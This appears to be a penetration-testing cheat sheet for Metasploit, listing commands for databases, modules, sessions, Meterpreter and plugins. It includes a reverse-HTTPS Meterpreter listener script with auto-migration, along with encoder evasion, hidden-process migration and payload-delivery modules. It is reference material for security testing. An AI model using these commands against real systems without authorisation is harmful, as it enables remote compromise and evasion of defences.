# Metasploit ## [Metasploit](https://www.metasploit.com/) installation {% code overflow="wrap" %} ```bash sudo apt install postgresql sudo apt install metasploit-framework ``` {% endcode %} ## Start

Description	Command
Update	`sudo apt update && sudo apt install metasploit-framework`
Run	`msfconsole` `msfconsole -q` `service postgresql start && msfconsole`

## Database

Description	Command
Initialization	`msfdb init` `msfdb reinit`
Check	`db_status`
Help	`help database`

## Workspace

Description	Command
Help	`workspace -h`
Listing	`workspace`
Selecting	`workspace <NAME>`
New	`workspace -a <NAME>`
Delate workspace	`workspace -d`
Delete all workspace	`workspace -D`
Nmap	`db_nmap <COMMAND_NMAP>`
Display data `<TYPE> -h`	`hosts` `services` `creds` `loot` `analyze` `vulns` `notes` `route`
Export	`db_export -f xml`
Import	`db_import <FILE_SCAN_NESSUS.nessus>` `db_import <FILE_SCAN_NMAP.xml>`

## Command

Description	Command
Help	`help` `<COMMAND >-h`
Refresh	`reload_all`
Search modules	<type>/<os>/<service>/<name> Type: exploits, payloads, auxiliary, post, etc. `search <STRING>` `search type:<TYPE> name:<STRING> [<KEYWORD>:<VALUE>]`
Filter	`grep <STRING1> grep <STRING2> <COMMAND>`
Info module	`info <N>`
Select module	`use <N>`
Setting Options	`show options` `set <VARIABLE> <VALUE>` `show advanced`
Setting Payload	`show payloads` `set payload <N>`
Setting Target	`show targets` `set target <N>`
Encoders	`show encoders`
Setting Global	`setg <VARIABLE> <VALUE>`
Run	`check` `run` `exploit` `exploit -e <shikata_ga_nai>`

## Sessions

Description	Command
Help	`sessions -h`
Listing	`sessions`
Upgrade	`sessions -u <ID>`
Resume	`sessions -i <ID>`
Close	`sessions -k <ID>`
Close all	`sessions -K`

## Job

Description	Command
Help	`jobs -h`
Start exploit in jobs	`exploit -j`
Listing	`jobs -l`
Close	`jobs -k <ID>`
Close all	`jobs -K`

## Meterpreter

Description	Command
Help	`help` `<COMMAND> -h`
Local command	`l<COMMAND>`
Modules	`run <MODULES>` post/multi/recon/local_exploit_suggester
Migrate	`ps` (explorer or lsas) `pgrep <NAME>` `migrate <PID>` `execute -H -f notepad` (create a hidden process for migration)
Background	`background` `CTRL+Z`
Close	`exit` `CTRL+C`
To obtain it	`exploit/multi/script/web_delivery` `exploit/windows/smb/smb_delivery` or `Exploits`

## Plugin Add plugin in `/usr/share/metasploit-framework/plugins`

Description	Command
Upload	`load <PLUGIN>`
Autopwn	`load db_autopwn` `db_autopwn`
WMAP	`load wmap` `wmap_<TAB>` `wmap_<X> -h`
Pentest	`load pentest`

## Script `/usr/share/metasploit-framework/scripts/resource` {% code title="listener.rc" overflow="wrap" %} ```ruby use exploit/multi/handler set PAYLOAD windows/meterpreter_reverse_https set LHOST tun0 set LPORT 8888 set AutoRunScript post/windows/manage/migrate set ExitOnSession false run -z -j ``` {% endcode %} {% code overflow="wrap" %} ```bash sudo msfconsole -r listener.rc ``` {% endcode %} ## Non-Staged & Staged

Type	Description
Non-Staged	Single payload. es. windows/shell_bind_tcp
Staged	Two part. es. in windows/shell/bind_tcp